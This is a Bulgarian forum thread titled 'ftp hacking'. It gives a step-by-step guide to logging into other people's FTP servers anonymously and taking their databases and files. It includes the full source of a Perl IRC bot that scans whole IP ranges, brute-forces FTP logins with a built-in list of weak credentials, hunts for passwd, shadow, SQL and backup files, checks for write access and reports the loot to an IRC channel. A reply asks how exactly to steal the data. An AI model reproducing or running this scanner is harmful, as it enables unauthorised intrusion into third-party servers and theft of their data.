2GOOD4U
2GOOD4U 1.6 Server's iP
cs.ko.tl:27015 Dust2
cs.ko.tl:27016 Aim
cs.ko.tl:27017 Awp
cs.ko.tl:27018 Italy2
cs.ko.tl:27019 5on5 #1

ftp hacking

Go down

Важна тема ftp hacking

Писане by hARDCORE on Пон Апр 25, 2011 9:23 am

Здравейте.
Реших да ви направя този урок, защото само гледам в форуми и тук - "Аааа немога да хакна сайт ПОМОООЩ"
и тем подобни простотий!
Така, Да започваме:

Няма да ви качвам никакви тулове, защото колкото повече ползвате тулове толкова повече изпростявате(и после неможе да наречеш някаф такъв хакер дори и начинаещ!)

Намираме си сайт с отворен ftp порт обикновенно 21.
Ако сайта е с отворен порт, добре.
Сега отваряме CMD.
пишеме:
ftp
o
после излиза open to:тук е мястото за ипто на сайта!
слагате го и ако зареди успешно ще изпише така:
[align=center]220 FTP Server ready.
User (193.33.107.135:(none)):[/align]
или
[align=center]
Connected to [You must be registered and logged in to see this link.]
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 09:26. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
User ([You must be registered and logged in to see this link.]

първо ще опитаме така, не пишете юзър и парола само натискате ентър и ако всичко е ОК, ще ви изпише че се логвате анонимно, но повечето системи не е гаранция!
после пишете
quote user ftp

послe

quote pass ftp

и ще ви излезе нещо от типа Anonymus acces garanted...
и започвате да взимате данни ДБ и кфото ви падне!
Ако случайно неможе ще се нуждаете от Брутфорс ето един пърл

#!/usr/bin/perl
#
# Hollow Chocolate Bunnies From Hell
# presenting
# becks.pl - FTP scanner by softxor
# Version 0.9
#
#
# becks.pl is an IRC bot that scans for anonymous FTP servers or FTP's witth easy to break
# password protection and posts the contents (if anonymous login) or the login data to a specific Channel
#
# usage: ./ftp_scan 132.311.0.0
#
# Greets fly out to: rembrandt, kamooo, evil, zera, litestar, #milw0rm
#
# Contact:
# - WWW: [You must be registered and logged in to see this link.]
# - MAIL: insertnamehere at gmx dot de
# - IRC: #hcbfh @ irc.milw0rm.com
#
# NOTE: This bot has been written just for fun. If you can't get it running, it's better that way.
#
# Yet to come:
# extern pass/userfile

use strict;
use warnings;
use Net::FTP;

#################################
# Global Configuration #
#################################
my %config = (max_childs => 10, # Maximal parallel process (recomended up to 100)
logging => 0, # If 1, then enable logging
use_brute_force => 1, # If 0, then scans only for anonymous ftps
indexing => 0, # If 1, creates for every accessed ftp a file with the contents of that ftpd
anon_email => 'somedude@somewhere.com', # Email Address to use in anonymous checking
timeout => 1, # Connection timeout in seconds
passfile => '', # Missing/not implemented in this version
userfile => ''); # Missing/not implemented in this version

#################################
# IRC settings #
#################################
my %irc = (enabled => 1, # 1 for enable IRC bot
server => '127.0.0.1',
port => 6667,
nickname => 'Bot|FTP|'.int(rand(99)),
username => 'ftpbot ftpbot ftbot ftpbot', # Yes it has to be four times
channel => '#channel',
nickserv => ''); # Nickserv password

#################################
# Data for brute forcing attack #
#################################
my @usernames = qw(Administrator upload admin web webmaster user root ftp adm guest);

my @passwords = qw(password qwertz asdf test test123 1234 1111 12 345678 4321 12345678 123456 secret letmein upload pass support passwort god love 007 admin knight wizard letmein test administrator root web webmaster ftp);


# Global declarations
my $childs = 0;


# Mirc colors
my %colors = (white => "\x030",
red => "\x034",
green => "\x033",
gray => "\x0314",
yellow=> "\x038",
blue => "\x0312",
cyan => "\x0311",
orange=> "\x0307");


# Parse teh argument!
my($ipa, $ipb, $ipc, $ipd) = ($ARGV[0] =~ m/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/) or die("Append start IP.\n");


&main();
exit();


sub main {

# Start IRC notifying process
if ($irc{'enabled'} == 1) {
pipe(IN, OUT) || die "Can't create pipe....\n";

OUT->autoflush(1);
IN->autoflush(1);

if (!fork) {
&irc_notify();
} else {
close IN;
}

sleep(30); # needed to let the IRC process join the channel
}

close IN;


print "Start scanning...\nBe patient.\n";

my $OUTPUT_AUTOFLUSH = 1; # To avoid buffering problems with fork()

# loop through IPs
while (1) {
for my $a ($ipa..255) {

if ($a == 10 || $a == 198 || $a == 127 || $a == 0 || $a == 172 || $a == 1) {
next;
}

for my $b ($ipb..255) {
for my $c ($ipc..255) {
for my $d ($ipd..255) {

if (fork() == 0) {
#print "$a.$b.$c.$d\n"; # Uncomment for verbose output
&scan("$a.$b.$c.$d");
exit;
} else {
$childs++;
if ($childs >= $config{'max_childs'}) {
wait();
$childs--;
}
}

} # end $d
} # end $c
} # end $b
} #end $a

} # end while

} #end main()


# gets the content of a dir by recursion
sub get_dir {

my ($cur_dir, $ftp) = @_;
my ($content, @found_files, $write, @dirs);
$content = ''; # needed
my %data_types = (mpg => 'Video',
avi => 'Video',
xvid=> 'DivX',
divx=> 'DivX',
mp3 => 'Music',
ogg => 'Music',
sql => 'MySQL',
xxx => 'Pr0n',
pdf => 'Pdf',
jpg => 'Pictures',
gif => 'Pictures',
zip => 'Zip',
ace => 'Ace',
rar => 'Rar',
exe => 'Exe',
txt => 'Txt',
passwd => 'passwd',
shadow => 'shadow',
htm => 'HTML',
mdb => 'AccessDB',
bak => 'Backup',
xls => 'Excel Sheet');

$ftp->cwd($cur_dir);
my @files = $ftp->dir;

if ($cur_dir eq '/') {
$write = &test_write($ftp);
}

# $_ isnt working here, because of validity conflicts Sad
foreach my $file (@files) {

if ($file eq '.' || $file eq '..') {
next;
}


if ($file =~ m/^d[rwx-].*\d\s(.*?)$/) {
push (@dirs, $1);
} else {

# find interesting content
foreach my $type (keys %data_types) {
if ($file =~ m/$type$/gi) {
push (@found_files, $data_types{$type});
}
}

}

} # end for each


while(my $cur = pop(@dirs)) {
if ($cur_dir eq '/') {
$content .= &get_dir('/'.$cur, $ftp);
} else {
$content .= &get_dir($cur_dir.'/'.$cur, $ftp);
}
}


@found_files = &del_double(@found_files);

foreach my $files (@found_files) {
$content .= $files.' ';
}


if ($write) {
$content .= "$colors{'red'}Write-Enabled";
}

return $content;

}



sub scan {

my ($host) = @_;

my $ftp = Net::FTP->new($host,Timeout=>$config{'timeout'}) or return;


# grab banner
my $banner = $ftp->message;
$banner =~ s/\n/ /g;


# Anonymous checker
if ($ftp->login('anonymous', $config{'anon_email'})) {

if ($config{'logging'}) {
open(LOG, ">anonymous.log");
} else {
open(LOG, '>-');
}



if ($config{'indexing'}) {
my $content = &get_dir("/", $ftp);

if($irc{'enabled'}) {

if ($content ne '') {
print OUT "$colors{'blue'}Anonymous $colors{'green'}FTP: $colors{'gray'}ftp://$host/ $colors{'blue'}Content: $colors{'green'}$content$colors{'blue'}Banner: $colors{'green'}$banner\n";
} else {
print OUT "$colors{'blue'}Anonymous $colors{'green'}FTP: $colors{'gray'}ftp://$host/ $colors{'blue'}Banner: $colors{'green'}$banner\n";
}

} #end irc

print LOG "ftp://$host/ Content: $content Banner: $banner\n"

} else {

if($irc{'enabled'}) {
print OUT "$colors{'blue'}Anonymous $colors{'green'}FTP: $colors{'gray'}ftp://$host/ $colors{'blue'}Banner: $colors{'orange'}$banner\n";
}

print LOG "ftp://$host/ Banner: $banner\n"

}

close(LOG);

$ftp->quit;

return;
} # end anonymous



# if you're not willing, you'll never grow old!
if ($config{'use_brute_force'}) {

foreach my $user (@usernames) {
foreach my $pass (@passwords) {
if($ftp->login($user, $pass)) {

if ($config{'logging'}) {
open(LOG, ">protected.log");
} else {
open(LOG, '>-');
}


if($irc{'enabled'}) {
print OUT "$colors{'red'}ftp://$user:$pass\@$host/ $colors{'blue'}banner: $colors{'orange'}$banner\n";
}

print LOG "ftp://$user:$pass\@$host/\n";
close(LOG);

$ftp->quit;

return;

} else {
next;
}
}
}
} # end brute force


return;
}



# paste incoming ftps on the irc channel
sub irc_notify {

print "Staring IRC client\n";

close OUT;

my $con = IO::Socket::INET->new(PeerAddr=>$irc{'server'},
PeerPort=>$irc{'port'},
Proto=>'tcp',
Timeout=>'30') or die("Error: IRC handler cannot connect\n");

if(fork) {
# waiting for new ftps, to give them out
while (my $answer = <$con>) {

if($answer =~ m/^PING \Sad.*?)$/gi) {
print $con "PONG :".$1."\n";
}

}

}

print $con "USER $irc{'username'}\r\n";
print $con "NICK $irc{'nickname'}\r\n";

sleep(5);
print $con "JOIN $irc{'channel'}\r\n";
print "IRC client is running.\n";

if ($irc{'nickserv'}) {
print $con "privmsg nickserv IDENTIFY $irc{'nickserv'}\r\n";
}


# make sure we dont ping out
while (my $ftp = ) {
print $con "privmsg $irc{'channel'} :$ftp\r\n";
}

close $con;
}



# test if ftp is write enabled
# return 1 if writing is allowed,
# 0 if permitted
sub test_write {
my $ftp = $_[0];

if ($ftp->mkdir("test")) {
$ftp->rmdir("test"); # we want to be 'polite' Wink
return 1;
}

return 0;
}



# deletes double entries in an array
sub del_double {
my %all;

grep { $all {$_} = 0} @_;

return (keys %all);
}
avatar
hARDCORE
Power user

Male Zodiac : Sagittarius Брой мнения : 297
Отсенка : 1337
Rep : 10
Регистриран на : 13.01.2010
Age : 21
Местожителство : PLOVDIV

точки
точки:
652/1000  (652/1000)

Вижте профила на потребителя http://bginter.bulgarianforum.net

Върнете се в началото Go down

Важна тема Re: ftp hacking

Писане by peterchen on Пет Фев 03, 2012 4:36 pm

МСС

peterchen
Статист

Брой мнения : 1
Отсенка : 1
Rep : 0
Регистриран на : 25.01.2012

Вижте профила на потребителя

Върнете се в началото Go down

Важна тема Re: ftp hacking

Писане by u3PyT on Пон Юли 30, 2012 1:42 pm

и как по точно да свивам теяя данни .. аз съм нууб тоест,това започна да ме влезе и днес седнах да чета : ) .. ако някой ми обясни ще съм му супер благодарен

u3PyT
Статист

Брой мнения : 1
Отсенка : 1
Rep : 0
Регистриран на : 30.07.2012

Вижте профила на потребителя

Върнете се в началото Go down

Важна тема Re: ftp hacking

Писане by Sponsored content


Sponsored content


Върнете се в началото Go down

Върнете се в началото


 
Права за този форум:
Не Можете да отговаряте на темите